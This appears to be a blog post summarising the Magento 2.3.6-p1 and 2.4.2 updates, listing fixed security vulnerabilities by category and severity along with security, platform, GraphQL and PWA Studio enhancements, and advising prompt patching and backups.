Magento 2.3.6-p1 and 2.4.2 Updates

·

·

Magento released new versions containing upgrades, substantial security changes, and performance improvements. The patched security vulnerabilities were not exploited yet, but you should install security updates always as soon as possible. If you just want to install the fixes for the vulnerabilities, there are security-only patches available (ASPB20-59).

Fixed vulnerabilities

CategoryVulnerability ImpactSeverityMagento Bug ID
File Upload Allow List BypassArbitrary code execution Critical PRODSECBUG-2799
SQL InjectionArbitrary read or write access to databaseCritical PRODSECBUG-2779
Improper AuthorizationUnauthorized modification of customer listImportantPRODSECBUG-2789
Insufficient Invalidation of User SessionUnauthorized access to restricted resourcesImportantPRODSECBUG-2785
Improper AuthorizationUnauthorized modification of Magento CMS pagesImportantPRODSECBUG-2796
Sensitive Information DisclosureDisclosure of document root pathModeratePRODSECBUG-2798
Cross-site Scripting (Stored XSS)Arbitrary JavaScript execution in the browserImportantPRODSECBUG-2804
Improper AuthorizationUnauthorized access to restricted resourcesImportantPRODSECBUG-2797
Improper AuthorizationUnauthorized access to restricted resourcesImportantPRODSECBUG-2791
Security Update for Magento | APSB20-59

Highlights of the new versions

  • Over 15 (35 for Magento 2.4) security enhancements that help close remote code execution (RCE) and cross-site scripting (XSS) vulnerabilities
  • CAPTCHA protection has been added to the following product areas:
    • Place Order storefront page and REST and GraphQL endpoints
    • Payment-related REST and GraphQL endpoints.

Magento 2.4.2 additional new enhancements

Additional security enhancements

  • All core cookies now support the SameSite attribute.
  • Magento now displays messages that identify potentially malicious content in product and category description fields when the user tries to save values in these fields.
  • File system operations across Magento components have been standardized and hardened to prevent malicious uploads.
  • Core Content Security Policy (CSP) violations have been fixed.

Platform enhancements

  • Elasticsearch 7.9.x is now supported.
  • Magento 2.4.2 has been tested with Varnish 6.4.
  • Redis 6.x is now supported.
  • Magento 2.4.2 is now compatible with Composer 2.x.

Performance enhancements

This release includes code enhancements that boost API performance and Admin response time for deployments with large catalogs.

GraphQL

  • Added support for comparison lists.
  • Added the generateCustomerTokenAsAdmin mutation and updated the Customer object to support remote purchasing assistance.
  • Added localization support across stores to support tasks such as changing languages, carts, and currencies.
  • Added support for unions in Magento GraphQL.
  • The GraphQL schema has been enhanced to optimize product data retrieval for configurable products with many variants.
  • Integer type object IDs have been deprecated in favor of uid attributes of type ID.
  • Added the staging attribute to the ProductInterface and CategoryInterface to determine if a product is staged and to view its associated campaign information.

PWA Studio

  • Internationalization and localization. 
  • Improved extensibility framework to support code changes through extensions.
  • Initial components for My Account related features such as Wishlist, Saved Payments, Address Book, and Order History.
  • Various performance optimizations and bug fixes.
  • New Role Resources for Media Gallery to control who can perform these actions:
    • Insert media assets into content
    • Upload assets
    • Edit assets details
    • Delete assets from the Media Gallery
    • Manage folder structure.
  • Web-optimized images in content.

Other enhancements

  • This release includes Adobe Stock Integration v2.1.1.
  • MFTF 3.2.1 is now available.
  • Vendor Developed Extensions Updates
  • AWS S3 support enhancements

Fixed issues

In both Magento 2.3 and Magento 2.4 updates a lot of issues were fixed. To see a full list of all over 160 fixes for Magento 2.3 visit devdocs.magento.com.

For the over 280 fixes for Magento 2.4 visit devdocs.magento.com.

Remember to create a backup before installing updates. Picture courtesy of Joseph Kellner.